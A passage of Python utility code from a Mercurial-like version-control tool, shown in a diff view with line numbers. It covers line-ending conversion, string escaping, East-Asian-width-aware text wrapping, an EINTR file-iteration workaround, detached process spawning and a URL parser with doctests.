    # Windows: translate between the LF-internal form and CRLF-native form.
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    # POSIX: the native EOL already is LF, so both directions are no-ops.
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2441
2446
def escapestr(s):
    """Backslash-escape the byte string s (as 'string_escape' would).

    codecs.escape_encode is the C routine behind s.encode('string_escape')
    on Python 2; calling it directly also works on Python 3, where the
    'string_escape' codec no longer exists.
    """
    escaped, _length = codecs.escape_encode(s)
    return escaped
2446
2451
def unescapestr(s):
    """Decode backslash escapes in byte string s (inverse of escapestr)."""
    decoded, _consumed = codecs.escape_decode(s)
    return decoded
2449
2454
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string.

    Tries the cheap direct conversion first; if the object stringifies to
    non-ascii text, falls back to the local encoding (possibly lossy).
    """
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2458
2463
def uirepr(s):
    """Return a repr() of s suitable for user-facing output.

    Collapses doubled backslashes so Windows paths stay readable.
    """
    # Avoid double backslash in Windows path repr()
    return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2462
2467
# delay import of textwrap
def MBTextWrapper(**kwargs):
    """Build a display-width-aware TextWrapper instance.

    The subclass is created lazily (deferring textwrap's import cost) and
    then cached by rebinding the module-level name MBTextWrapper to the
    class itself, so subsequent calls construct instances directly.
    """
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # Split ucstr at the last character boundary that still fits
            # within space_left display columns.
            l = 0
            colwidth = encoding.ucolwidth
            # NOTE: xrange — this code path still targets Python 2.
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                # Cannot break the word: put it on a line by itself.
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chunks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # Self-replacing factory: cache the class so later calls skip the
    # class-body execution entirely.
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2566
2571
def wrap(line, width, initindent='', hangindent=''):
    """Word-wrap the byte string line to width display columns.

    initindent prefixes the first output line, hangindent every following
    one; the result is re-encoded to the local encoding.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    # Width computation must happen on unicode; decode all byte inputs
    # with the same codec/error mode, then re-encode the wrapped result.
    codec = pycompat.sysstr(encoding.encoding)
    errmode = pycompat.sysstr(encoding.encodingmode)
    uline = line.decode(codec, errmode)
    uinit = initindent.decode(codec, errmode)
    uhang = hangindent.decode(codec, errmode)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=uinit,
                            subsequent_indent=uhang)
    return wrapper.fill(uline).encode(codec)
2582
2587
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    # --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            # Read raw chunks via os.read (retrying on EINTR) and re-split
            # them into lines, carrying any partial last line over to the
            # next chunk.
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # Incomplete trailing line: keep for next chunk.
                            line = l
                if not buf:
                    # EOF reached.
                    break
            if line:
                yield line

    def iterfile(fp):
        # Regular on-disk files do not hit the EINTR bug in practice, so
        # keep the fast native iterator for them (see table above).
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2654
2659
def iterlines(iterator):
    """Yield the individual lines contained in an iterable of text chunks."""
    for block in iterator:
        for single in block.splitlines():
            yield single
2659
2664
def expandpath(path):
    """Expand environment variables, then ~user constructs, in path."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2662
2667
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    # Non-frozen installs: defer to the platform's command detection.
    if not mainfrozen():
        return gethgcmd()
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2677
2682
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # Reap the child; record its (pid, status) so the loop below can
        # detect that it exited.
        terminated.add(os.wait())
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # Re-check condfn() after the liveness test to close the race
            # where the child succeeds immediately before exiting.
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        if prevhandler is not None:
            # Restore the previous SIGCHLD disposition.
            signal.signal(signal.SIGCHLD, prevhandler)
2712
2717
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            # Strip the leading regex-escape backslash to get the raw char.
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # Fix: work on a copy so the caller's mapping is not clobbered
        # with the identity entry needed only for prefix escaping.
        mapping = dict(mapping)
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    # x.group() includes the prefix character; strip it before lookup.
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2737
2742
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # Not numeric: resolve it as a service name.
        try:
            return socket.getservbyname(pycompat.sysstr(port))
        except socket.error:
            raise Abort(_("no port number associated with service '%s'")
                        % port)
2754
2759
# Recognized spellings for boolean config values; parsebool() maps any of
# these (case-insensitively) to True/False and anything else to None.
_booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
             '0': False, 'no': False, 'false': False, 'off': False,
             'never': False}
2758
2763
def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    # dict.get already defaults to None for unrecognized spellings.
    return _booleans.get(s.lower())
2765
2770
# Lookup table mapping every two-hex-digit string (all case combinations)
# to the character with that ordinal; used for fast %XX unescaping.
_hextochr = dict((a + b, chr(int(a + b, 16)))
                 for a in string.hexdigits for b in string.hexdigits)
2768
2773
2769 class url(object):
2774 class url(object):
2770 r"""Reliable URL parser.
2775 r"""Reliable URL parser.
2771
2776
2772 This parses URLs and provides attributes for the following
2777 This parses URLs and provides attributes for the following
2773 components:
2778 components:
2774
2779
2775 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2780 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2776
2781
2777 Missing components are set to None. The only exception is
2782 Missing components are set to None. The only exception is
2778 fragment, which is set to '' if present but empty.
2783 fragment, which is set to '' if present but empty.
2779
2784
2780 If parsefragment is False, fragment is included in query. If
2785 If parsefragment is False, fragment is included in query. If
2781 parsequery is False, query is included in path. If both are
2786 parsequery is False, query is included in path. If both are
2782 False, both fragment and query are included in path.
2787 False, both fragment and query are included in path.
2783
2788
2784 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2789 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2785
2790
2786 Note that for backward compatibility reasons, bundle URLs do not
2791 Note that for backward compatibility reasons, bundle URLs do not
2787 take host names. That means 'bundle://../' has a path of '../'.
2792 take host names. That means 'bundle://../' has a path of '../'.
2788
2793
2789 Examples:
2794 Examples:
2790
2795
2791 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2796 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2792 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2797 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2793 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2798 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2794 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2799 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2795 >>> url(b'file:///home/joe/repo')
2800 >>> url(b'file:///home/joe/repo')
2796 <url scheme: 'file', path: '/home/joe/repo'>
2801 <url scheme: 'file', path: '/home/joe/repo'>
2797 >>> url(b'file:///c:/temp/foo/')
2802 >>> url(b'file:///c:/temp/foo/')
2798 <url scheme: 'file', path: 'c:/temp/foo/'>
2803 <url scheme: 'file', path: 'c:/temp/foo/'>
2799 >>> url(b'bundle:foo')
2804 >>> url(b'bundle:foo')
2800 <url scheme: 'bundle', path: 'foo'>
2805 <url scheme: 'bundle', path: 'foo'>
2801 >>> url(b'bundle://../foo')
2806 >>> url(b'bundle://../foo')
2802 <url scheme: 'bundle', path: '../foo'>
2807 <url scheme: 'bundle', path: '../foo'>
2803 >>> url(br'c:\foo\bar')
2808 >>> url(br'c:\foo\bar')
2804 <url path: 'c:\\foo\\bar'>
2809 <url path: 'c:\\foo\\bar'>
2805 >>> url(br'\\blah\blah\blah')
2810 >>> url(br'\\blah\blah\blah')
2806 <url path: '\\\\blah\\blah\\blah'>
2811 <url path: '\\\\blah\\blah\\blah'>
2807 >>> url(br'\\blah\blah\blah#baz')
2812 >>> url(br'\\blah\blah\blah#baz')
2808 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2813 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2809 >>> url(br'file:///C:\users\me')
2814 >>> url(br'file:///C:\users\me')
2810 <url scheme: 'file', path: 'C:\\users\\me'>
2815 <url scheme: 'file', path: 'C:\\users\\me'>
2811
2816
2812 Authentication credentials:
2817 Authentication credentials:
2813
2818
2814 >>> url(b'ssh://joe:xyz@x/repo')
2819 >>> url(b'ssh://joe:xyz@x/repo')
2815 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2820 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2816 >>> url(b'ssh://joe@x/repo')
2821 >>> url(b'ssh://joe@x/repo')
2817 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2822 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2818
2823
2819 Query strings and fragments:
2824 Query strings and fragments:
2820
2825
2821 >>> url(b'http://host/a?b#c')
2826 >>> url(b'http://host/a?b#c')
2822 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2827 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2823 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2828 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2824 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2829 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2825
2830
2826 Empty path:
2831 Empty path:
2827
2832
2828 >>> url(b'')
2833 >>> url(b'')
2829 <url path: ''>
2834 <url path: ''>
2830 >>> url(b'#a')
2835 >>> url(b'#a')
2831 <url path: '', fragment: 'a'>
2836 <url path: '', fragment: 'a'>
2832 >>> url(b'http://host/')
2837 >>> url(b'http://host/')
2833 <url scheme: 'http', host: 'host', path: ''>
2838 <url scheme: 'http', host: 'host', path: ''>
2834 >>> url(b'http://host/#a')
2839 >>> url(b'http://host/#a')
2835 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2840 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2836
2841
2837 Only scheme:
2842 Only scheme:
2838
2843
2839 >>> url(b'http:')
2844 >>> url(b'http:')
2840 <url scheme: 'http'>
2845 <url scheme: 'http'>
2841 """
2846 """
2842
2847
2843 _safechars = "!~*'()+"
2848 _safechars = "!~*'()+"
2844 _safepchars = "/!~*'()+:\\"
2849 _safepchars = "/!~*'()+:\\"
2845 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2850 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2846
2851
2847 def __init__(self, path, parsequery=True, parsefragment=True):
2852 def __init__(self, path, parsequery=True, parsefragment=True):
2848 # We slowly chomp away at path until we have only the path left
2853 # We slowly chomp away at path until we have only the path left
2849 self.scheme = self.user = self.passwd = self.host = None
2854 self.scheme = self.user = self.passwd = self.host = None
2850 self.port = self.path = self.query = self.fragment = None
2855 self.port = self.path = self.query = self.fragment = None
2851 self._localpath = True
2856 self._localpath = True
2852 self._hostport = ''
2857 self._hostport = ''
2853 self._origpath = path
2858 self._origpath = path
2854
2859
2855 if parsefragment and '#' in path:
2860 if parsefragment and '#' in path:
2856 path, self.fragment = path.split('#', 1)
2861 path, self.fragment = path.split('#', 1)
2857
2862
2858 # special case for Windows drive letters and UNC paths
2863 # special case for Windows drive letters and UNC paths
2859 if hasdriveletter(path) or path.startswith('\\\\'):
2864 if hasdriveletter(path) or path.startswith('\\\\'):
2860 self.path = path
2865 self.path = path
2861 return
2866 return
2862
2867
2863 # For compatibility reasons, we can't handle bundle paths as
2868 # For compatibility reasons, we can't handle bundle paths as
2864 # normal URLS
2869 # normal URLS
2865 if path.startswith('bundle:'):
2870 if path.startswith('bundle:'):
2866 self.scheme = 'bundle'
2871 self.scheme = 'bundle'
2867 path = path[7:]
2872 path = path[7:]
2868 if path.startswith('//'):
2873 if path.startswith('//'):
2869 path = path[2:]
2874 path = path[2:]
2870 self.path = path
2875 self.path = path
2871 return
2876 return
2872
2877
2873 if self._matchscheme(path):
2878 if self._matchscheme(path):
2874 parts = path.split(':', 1)
2879 parts = path.split(':', 1)
2875 if parts[0]:
2880 if parts[0]:
2876 self.scheme, path = parts
2881 self.scheme, path = parts
2877 self._localpath = False
2882 self._localpath = False
2878
2883
2879 if not path:
2884 if not path:
2880 path = None
2885 path = None
2881 if self._localpath:
2886 if self._localpath:
2882 self.path = ''
2887 self.path = ''
2883 return
2888 return
2884 else:
2889 else:
2885 if self._localpath:
2890 if self._localpath:
2886 self.path = path
2891 self.path = path
2887 return
2892 return
2888
2893
2889 if parsequery and '?' in path:
2894 if parsequery and '?' in path:
2890 path, self.query = path.split('?', 1)
2895 path, self.query = path.split('?', 1)
2891 if not path:
2896 if not path:
2892 path = None
2897 path = None
2893 if not self.query:
2898 if not self.query:
2894 self.query = None
2899 self.query = None
2895
2900
2896 # // is required to specify a host/authority
2901 # // is required to specify a host/authority
2897 if path and path.startswith('//'):
2902 if path and path.startswith('//'):
2898 parts = path[2:].split('/', 1)
2903 parts = path[2:].split('/', 1)
2899 if len(parts) > 1:
2904 if len(parts) > 1:
2900 self.host, path = parts
2905 self.host, path = parts
2901 else:
2906 else:
2902 self.host = parts[0]
2907 self.host = parts[0]
2903 path = None
2908 path = None
2904 if not self.host:
2909 if not self.host:
2905 self.host = None
2910 self.host = None
2906 # path of file:///d is /d
2911 # path of file:///d is /d
2907 # path of file:///d:/ is d:/, not /d:/
2912 # path of file:///d:/ is d:/, not /d:/
2908 if path and not hasdriveletter(path):
2913 if path and not hasdriveletter(path):
2909 path = '/' + path
2914 path = '/' + path
2910
2915
2911 if self.host and '@' in self.host:
2916 if self.host and '@' in self.host:
2912 self.user, self.host = self.host.rsplit('@', 1)
2917 self.user, self.host = self.host.rsplit('@', 1)
2913 if ':' in self.user:
2918 if ':' in self.user:
2914 self.user, self.passwd = self.user.split(':', 1)
2919 self.user, self.passwd = self.user.split(':', 1)
2915 if not self.host:
2920 if not self.host:
2916 self.host = None
2921 self.host = None
2917
2922
2918 # Don't split on colons in IPv6 addresses without ports
2923 # Don't split on colons in IPv6 addresses without ports
2919 if (self.host and ':' in self.host and
2924 if (self.host and ':' in self.host and
2920 not (self.host.startswith('[') and self.host.endswith(']'))):
2925 not (self.host.startswith('[') and self.host.endswith(']'))):
2921 self._hostport = self.host
2926 self._hostport = self.host
2922 self.host, self.port = self.host.rsplit(':', 1)
2927 self.host, self.port = self.host.rsplit(':', 1)
2923 if not self.host:
2928 if not self.host:
2924 self.host = None
2929 self.host = None
2925
2930
2926 if (self.host and self.scheme == 'file' and
2931 if (self.host and self.scheme == 'file' and
2927 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2932 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2928 raise Abort(_('file:// URLs can only refer to localhost'))
2933 raise Abort(_('file:// URLs can only refer to localhost'))
2929
2934
2930 self.path = path
2935 self.path = path
2931
2936
2932 # leave the query string escaped
2937 # leave the query string escaped
2933 for a in ('user', 'passwd', 'host', 'port',
2938 for a in ('user', 'passwd', 'host', 'port',
2934 'path', 'fragment'):
2939 'path', 'fragment'):
2935 v = getattr(self, a)
2940 v = getattr(self, a)
2936 if v is not None:
2941 if v is not None:
2937 setattr(self, a, urlreq.unquote(v))
2942 setattr(self, a, urlreq.unquote(v))
2938
2943
2939 @encoding.strmethod
2944 @encoding.strmethod
2940 def __repr__(self):
2945 def __repr__(self):
2941 attrs = []
2946 attrs = []
2942 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2947 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2943 'query', 'fragment'):
2948 'query', 'fragment'):
2944 v = getattr(self, a)
2949 v = getattr(self, a)
2945 if v is not None:
2950 if v is not None:
2946 attrs.append('%s: %r' % (a, v))
2951 attrs.append('%s: %r' % (a, v))
2947 return '<url %s>' % ', '.join(attrs)
2952 return '<url %s>' % ', '.join(attrs)
2948
2953
2949 def __bytes__(self):
2954 def __bytes__(self):
2950 r"""Join the URL's components back into a URL string.
2955 r"""Join the URL's components back into a URL string.
2951
2956
2952 Examples:
2957 Examples:
2953
2958
2954 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2959 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2955 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2960 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2956 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2961 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2957 'http://user:pw@host:80/?foo=bar&baz=42'
2962 'http://user:pw@host:80/?foo=bar&baz=42'
2958 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2963 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2959 'http://user:pw@host:80/?foo=bar%3dbaz'
2964 'http://user:pw@host:80/?foo=bar%3dbaz'
2960 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2965 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2961 'ssh://user:pw@[::1]:2200//home/joe#'
2966 'ssh://user:pw@[::1]:2200//home/joe#'
2962 >>> bytes(url(b'http://localhost:80//'))
2967 >>> bytes(url(b'http://localhost:80//'))
2963 'http://localhost:80//'
2968 'http://localhost:80//'
2964 >>> bytes(url(b'http://localhost:80/'))
2969 >>> bytes(url(b'http://localhost:80/'))
2965 'http://localhost:80/'
2970 'http://localhost:80/'
2966 >>> bytes(url(b'http://localhost:80'))
2971 >>> bytes(url(b'http://localhost:80'))
2967 'http://localhost:80/'
2972 'http://localhost:80/'
2968 >>> bytes(url(b'bundle:foo'))
2973 >>> bytes(url(b'bundle:foo'))
2969 'bundle:foo'
2974 'bundle:foo'
2970 >>> bytes(url(b'bundle://../foo'))
2975 >>> bytes(url(b'bundle://../foo'))
2971 'bundle:../foo'
2976 'bundle:../foo'
2972 >>> bytes(url(b'path'))
2977 >>> bytes(url(b'path'))
2973 'path'
2978 'path'
2974 >>> bytes(url(b'file:///tmp/foo/bar'))
2979 >>> bytes(url(b'file:///tmp/foo/bar'))
2975 'file:///tmp/foo/bar'
2980 'file:///tmp/foo/bar'
2976 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2981 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2977 'file:///c:/tmp/foo/bar'
2982 'file:///c:/tmp/foo/bar'
2978 >>> print(url(br'bundle:foo\bar'))
2983 >>> print(url(br'bundle:foo\bar'))
2979 bundle:foo\bar
2984 bundle:foo\bar
2980 >>> print(url(br'file:///D:\data\hg'))
2985 >>> print(url(br'file:///D:\data\hg'))
2981 file:///D:\data\hg
2986 file:///D:\data\hg
2982 """
2987 """
2983 if self._localpath:
2988 if self._localpath:
2984 s = self.path
2989 s = self.path
2985 if self.scheme == 'bundle':
2990 if self.scheme == 'bundle':
2986 s = 'bundle:' + s
2991 s = 'bundle:' + s
2987 if self.fragment:
2992 if self.fragment:
2988 s += '#' + self.fragment
2993 s += '#' + self.fragment
2989 return s
2994 return s
2990
2995
2991 s = self.scheme + ':'
2996 s = self.scheme + ':'
2992 if self.user or self.passwd or self.host:
2997 if self.user or self.passwd or self.host:
2993 s += '//'
2998 s += '//'
2994 elif self.scheme and (not self.path or self.path.startswith('/')
2999 elif self.scheme and (not self.path or self.path.startswith('/')
2995 or hasdriveletter(self.path)):
3000 or hasdriveletter(self.path)):
2996 s += '//'
3001 s += '//'
2997 if hasdriveletter(self.path):
3002 if hasdriveletter(self.path):
2998 s += '/'
3003 s += '/'
2999 if self.user:
3004 if self.user:
3000 s += urlreq.quote(self.user, safe=self._safechars)
3005 s += urlreq.quote(self.user, safe=self._safechars)
3001 if self.passwd:
3006 if self.passwd:
3002 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3007 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3003 if self.user or self.passwd:
3008 if self.user or self.passwd:
3004 s += '@'
3009 s += '@'
3005 if self.host:
3010 if self.host:
3006 if not (self.host.startswith('[') and self.host.endswith(']')):
3011 if not (self.host.startswith('[') and self.host.endswith(']')):
3007 s += urlreq.quote(self.host)
3012 s += urlreq.quote(self.host)
3008 else:
3013 else:
3009 s += self.host
3014 s += self.host
3010 if self.port:
3015 if self.port:
3011 s += ':' + urlreq.quote(self.port)
3016 s += ':' + urlreq.quote(self.port)
3012 if self.host:
3017 if self.host:
3013 s += '/'
3018 s += '/'
3014 if self.path:
3019 if self.path:
3015 # TODO: similar to the query string, we should not unescape the
3020 # TODO: similar to the query string, we should not unescape the
3016 # path when we store it, the path might contain '%2f' = '/',
3021 # path when we store it, the path might contain '%2f' = '/',
3017 # which we should *not* escape.
3022 # which we should *not* escape.
3018 s += urlreq.quote(self.path, safe=self._safepchars)
3023 s += urlreq.quote(self.path, safe=self._safepchars)
3019 if self.query:
3024 if self.query:
3020 # we store the query in escaped form.
3025 # we store the query in escaped form.
3021 s += '?' + self.query
3026 s += '?' + self.query
3022 if self.fragment is not None:
3027 if self.fragment is not None:
3023 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3028 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3024 return s
3029 return s
3025
3030
3026 __str__ = encoding.strmethod(__bytes__)
3031 __str__ = encoding.strmethod(__bytes__)
3027
3032
3028 def authinfo(self):
3033 def authinfo(self):
3029 user, passwd = self.user, self.passwd
3034 user, passwd = self.user, self.passwd
3030 try:
3035 try:
3031 self.user, self.passwd = None, None
3036 self.user, self.passwd = None, None
3032 s = bytes(self)
3037 s = bytes(self)
3033 finally:
3038 finally:
3034 self.user, self.passwd = user, passwd
3039 self.user, self.passwd = user, passwd
3035 if not self.user:
3040 if not self.user:
3036 return (s, None)
3041 return (s, None)
3037 # authinfo[1] is passed to urllib2 password manager, and its
3042 # authinfo[1] is passed to urllib2 password manager, and its
3038 # URIs must not contain credentials. The host is passed in the
3043 # URIs must not contain credentials. The host is passed in the
3039 # URIs list because Python < 2.4.3 uses only that to search for
3044 # URIs list because Python < 2.4.3 uses only that to search for
3040 # a password.
3045 # a password.
3041 return (s, (None, (s, self.host),
3046 return (s, (None, (s, self.host),
3042 self.user, self.passwd or ''))
3047 self.user, self.passwd or ''))
3043
3048
3044 def isabs(self):
3049 def isabs(self):
3045 if self.scheme and self.scheme != 'file':
3050 if self.scheme and self.scheme != 'file':
3046 return True # remote URL
3051 return True # remote URL
3047 if hasdriveletter(self.path):
3052 if hasdriveletter(self.path):
3048 return True # absolute for our purposes - can't be joined()
3053 return True # absolute for our purposes - can't be joined()
3049 if self.path.startswith(br'\\'):
3054 if self.path.startswith(br'\\'):
3050 return True # Windows UNC path
3055 return True # Windows UNC path
3051 if self.path.startswith('/'):
3056 if self.path.startswith('/'):
3052 return True # POSIX-style
3057 return True # POSIX-style
3053 return False
3058 return False
3054
3059
3055 def localpath(self):
3060 def localpath(self):
3056 if self.scheme == 'file' or self.scheme == 'bundle':
3061 if self.scheme == 'file' or self.scheme == 'bundle':
3057 path = self.path or '/'
3062 path = self.path or '/'
3058 # For Windows, we need to promote hosts containing drive
3063 # For Windows, we need to promote hosts containing drive
3059 # letters to paths with drive letters.
3064 # letters to paths with drive letters.
3060 if hasdriveletter(self._hostport):
3065 if hasdriveletter(self._hostport):
3061 path = self._hostport + '/' + self.path
3066 path = self._hostport + '/' + self.path
3062 elif (self.host is not None and self.path
